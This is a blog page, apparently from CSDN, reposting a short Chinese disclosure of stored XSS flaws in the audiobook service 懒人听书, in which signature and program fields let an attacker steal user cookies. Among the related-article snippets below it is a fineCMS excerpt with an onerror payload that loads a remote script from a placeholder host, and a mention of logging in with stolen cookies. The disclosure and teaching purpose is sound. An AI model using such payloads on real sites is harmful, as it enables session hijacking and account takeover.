【漏洞学习——XSS】懒人听书存储性XSS

XSS漏洞详解
最新推荐文章于 2024-07-13 22:18:49 发布
原创 最新推荐文章于 2024-07-13 22:18:49 发布 · 612 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了在个性签名、节目内容简介及节目名称等处存在的XSS跨站脚本漏洞,包括如何利用这些漏洞获取用户的cookie信息。

漏洞细节

1、在个性签名处存在XSS跨站脚本漏洞。

1.1、虽然在这里js代码执行不了,但是,当我们关注了其他用户以后,当用户查看关注通知时就会触发js代码。

1.2、获取到cookie

另外在我的节目:
内容简介处,节目名称处也存在XSS。

参见:https://bugs.shuimugan.com/bug/view?bug_no=130995

XXE漏洞详解
weixin_56714714的博客
07-25 8424
XXE 什么是XXE? ​ XXE全程xml外部实体,从安全角度来讲,由此引发的漏洞称之为XML外部实体攻击 XML作为一种使用较为广泛的数据传输格式,很多应用程序都包含有处理xml数据的代码, 许多过时或配置不当的XML处理器都会对外部实体进行引用,如果攻击者可以上传XML文档或者在XML文档 中添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器,XXE漏洞的出现和开发语言无关 只要是应用程序中对XML数据做了解析,而且这些数据又受用户控制,那么应用程序都可能受到XXE攻击 什么是XML?
iwebsec 靶场 —— XSS 漏洞
最新发布
技术笔记
10-31 475
xss
存储型XSS漏洞
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-25 1072
存储型XSS漏洞 原理:嵌入到web页面的恶意HTML会被存储到应用服务器端,例如你注册时候将用户昵称设置为XSS恶意代码,那么访问某些页面会显示用户名的时候就会触发恶意代码 我们先进入靶场 很明显它是一个CMS,我们第一反应就是有没有通杀啊 百度搜索 我们先在本地搭建一个FineCMS 搭建好过后,我们查看百度上找到了通杀漏洞文章 找到URL栏上的数据,我们提取出来 index.php?c=mail&m=test 尝试在本地搭建的进行测试 查看后台错误日志 成功得到执行,接着我们进入Xss平台
BageCMS(八哥CMS)v3.1.3.zip
07-06
BageCms是一款基于php5 mysql5开发的多功能开源的网站内容管理系统。使用高性能的PHP5的web应用程序开发框架YII构建,具有操作简单、稳定、安全、高效、跨平台等特点。采用MVC设计模式,模板定制方便灵活,内置小挂工具,方便制作各类功能和效果,BageCms可用于企业建站、个人博客、资讯门户、图片站等各类型站点。 BageCMS(八哥CMS)特点 1.开源免费 无论是个人还是企业展示型网站均可用本系统来完成 2.数据调用方便快捷 自主研发的数据调用模块,能快速调用各类型数据,方便建站 3.应用范围广 这套系统不是企业网站管理系统,也不是博客程序,更不是专业的图片管理系统,但它却具备大部分企业站、博客站、图片站的功能 4.安全高性能 基于高性能的PHP5的web应用程序开发框架YII构建具有稳定、安全、高效、跨平台等特点 5.URL自定义 系统支持自定义伪静态显示方式,良好的支持搜索引擎SEO。个性化设置每个栏目、内容的标题标签、描述标签、关键词标签 6.自定义数据模型 系统可自定义数据模型满足各种表示形式和字段需求 7.完善的后台权限控制 特有的管理员权限管理机制,可以灵活设置管理员的栏目管理权限、网站信息的添加、修改、删除权限等 BageCMS(八哥CMS)v3.1.3更新日志 此次更新仅做安全问题进行修正,未涉及到程序的功能升级。 BageCMS(八哥CMS)前台截图 BageCMS(八哥CMS)后台截图 后台地址:http://demo.bagecms.com/admini 用户:bagecms 密码:bagecms 相关阅读 同类推荐:站长常用源码 BageCMS安装教程:http://down.admin5.com/info/2013/0926/105491.html
python实现懒人听书
weixin_43533164的博客
07-10 858
import tkinter as tk # 文件选择框的库 import tkinter.filedialog as tkf # 智能语音库 import pyttsx3 # 2、实现选择书籍功能 def select_file(): global book_text book_text = '' # 以选择文件对话框 path = tkf.askopenfilename() with open(path, 'r', encoding='utf-8') as f.
坚持不下去怎么办?这些好用的懒人听书APP,专治没有毅力的你
佛系软件
10-22 1840
下班回家,吃了晚饭,已经很疲惫了,但又懒得看书,经常看手机对眼睛也不好。除了周末,估计所有的上班族下来班就想倒在床上吧,但是这样又匆匆忙忙的过去了一天。说好的学习呢?如果你每天想要充实自己却又没时间看书,下面这几款软件就是别人读书给你听,真的是躺在床上也能学啊! 1喜马拉雅FM: 这款软件的听书体验很好,在国内发展比较迅速,覆盖面更广,资源算丰富,综合性强,你想的到的他有,想不到的他也有。...
DVWA——XSS注入复现
qq_62056583的博客
07-13 2168
在对DVWA靶场漏洞复现前,先了解一下XSS漏洞的相关知识攻击者利用它向网页中注入恶意的客户端脚本,使得用户在访问页面时执行这些恶意脚本,从而达到攻击的目的。这种攻击通常利用了网站未对用户输入进行充分过滤或转义的情况。XSS的攻击方式分为三种,分别是:分别为反射型(Reflected),存储型(Stored)和DOM型。:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。(经后端,不经数据库):将用户输入的数据存储在服务器端。
机器学习实现web攻击检测——XSS、SQL注入、Webshell检测.zip
05-06
这些攻击手段对网站的安全性构成严重威胁,因此,使用机器学习来实现Web攻击检测已经成为一种有效的防御策略。本文将深入探讨这三种攻击方式,并介绍如何利用机器学习技术进行检测。 首先,我们来看跨站脚本攻击...
漏洞学习——XSS】喜马拉雅存储性XSS
Fly_鹏程万里
02-22 766
漏洞简介 喜马拉雅(ximalaya.com) 听有声小说新闻音乐英语儿歌相声评书,就用喜马拉雅。 拥有中国最大的原创声音分享平台,数千位声音玩家每天发布数千条声音。 漏洞细节 1.专辑名称在输出的时候,过滤不严格。 2.在个人主页进行输出的时候,触发了XSS。 3.我们看获取到的cookie。并且使用获取到的cookie进行登录。 4.登录成功。 参见:https:...
XXE漏洞以及Blind XXE总结
热门推荐
Exploit的小站~
05-10 5万+
 转载请注明出处:http://blog.youkuaiyun.com/u011721501 0、前言 XXE漏洞是针对使用XML交互的Web应用程序的攻击方法,在XEE漏洞的基础上,发展出了BlindXXE漏洞。目前来看,XML文件作为配置文件(Spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVGheader)应用比较广泛,此外,网上有一些在线XML格式...
python爬取喜马拉雅音频,突破xm-sign校验反爬(爬虫)
travel_Capsule的博客
05-18 6961
目录 一、python执行js代码生成xm-sign 1.1获取喜马拉雅服务器时间戳 1.2生成xm-sign 二、根据需要爬取的专辑Id获取音频链接 三、爬取音频并保存 四、测试 好久没写博客了,写个玩玩 一、python执行js代码生成xm-sign 1.1获取喜马拉雅服务器时间戳 js生成xm-sign的函数需要用到这个时间戳,直接上代码啦 '''爬取喜马拉雅服务器系...
漏洞学习——XSS】fineCMS免费版xss+getshell
Fly_鹏程万里
02-22 2063
漏洞细节 注册一个用户,在发表文章的地方发表文章 在编辑器里加入一张图片 用firebug修改图片地址 加入onerror属性 onerror=document.body.appendChild(document.createElement('script')).src='//xxx.xxx/a.js' 因为发表的文章需要后台管理员审核的,当管理员审核的时候触发漏洞 然后是getsh...
XXE漏洞
chaojixiaojingang
08-31 1万+
XXE漏洞概念:        XXE (XML External Entity injection)XML 外部实体注入漏洞,如果XML 文件在引用外部实体时候,可以沟通构造恶意内容,可以导致读取任意文件,命令执行和对内网的攻击,这就是XXE漏洞,这个漏洞需要大家还有一定的XML协议基础,因此为了更好的去理解漏洞本身原理,必须给大家介绍一下XML相关的知识点。 (1)XML概念:     ...
[zkaq靶场]FineCMS的存储型XSS
wwxxee
05-09 2206
Fine CMS 存储型xss漏洞 本地测试 安装(版本v5.3.0) tip:这个cms需要安装在网站根目录,不能安装在子目录 然后访问install.php开始安装。 完成安装,访问后台。默认账户密码:admin/admin。 网站后台:提供错误日志查看功能。 在错误日志页面,我们可以看到错误日志的存放位置:WWW/cache/errorlog/log-2021-03-26.php 我们可以查看一下这个文件,然后输入一些内容测试一下。 在该文件的最后一行加入了测试内容 可以发现,后台的错误日志
漏洞学习——XSS】bagecms存储型xss可叉后台
Fly_鹏程万里
02-22 1423
漏洞细节 0x0A 前面发现留言板的过滤已经做的很好了,现在来说一个可以直接拿到管理员并且在后台修改php模板 getshell 的方法0x0B 首先我们来到了他的后台 0x0C 输入一串神奇的 xss  0x0D 登陆后台可以查看到,整个已经变形了,也就是说 logger 没有对 log 进行过滤记录,导致了存储型 XSS 。 0x0E 我们来看看这一项的代码 修复方案...
python scrapy+Mongodb爬取蜻蜓FM,酷我及懒人听书
weixin_34387468的博客
09-08 672
1、初衷:想在网上批量下载点听书、脱口秀之类,资源匮乏,大家可以一试 2、技术:wireshark scrapy jsonMonogoDB 3、思路:wireshark分析移动APP返回的各种连接分类、列表、下载地址等(json格式) 4、思路:scrapy解析json,并生成下载连接 5、思路:存储到MongoDB 6、难点:wireshark分析各类地址,都是简单的scrapy的基础使用,官...
【代码审计】QYKCMS_v4.3.2 前台存储型XSS跨站脚本漏洞分析
12-03 569
  0x00 环境准备 QYKCMS官网:http://www.qykcms.com/ 网站源码版本:QYKCMS_v4.3.2(企业站主题) 程序源码下载:http://bbs.qingyunke.com/thread-13.htm 测试网站首页:   0x01 代码分析 1、漏洞文件位置:/include/lib_post.php 第153-200行: case...
XSS漏洞检测新工具——XSS-Scan深入研究
从给定的文件信息中,我们可以提炼出关于Web漏洞爬虫工具的相关知识点,具体涉及到XSS漏洞的产生、利用方式、检测机制以及网络爬虫技术在安全审计中的应用。 首先,我们需要明确XSS漏洞(跨站脚本攻击)的定义。XSS...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值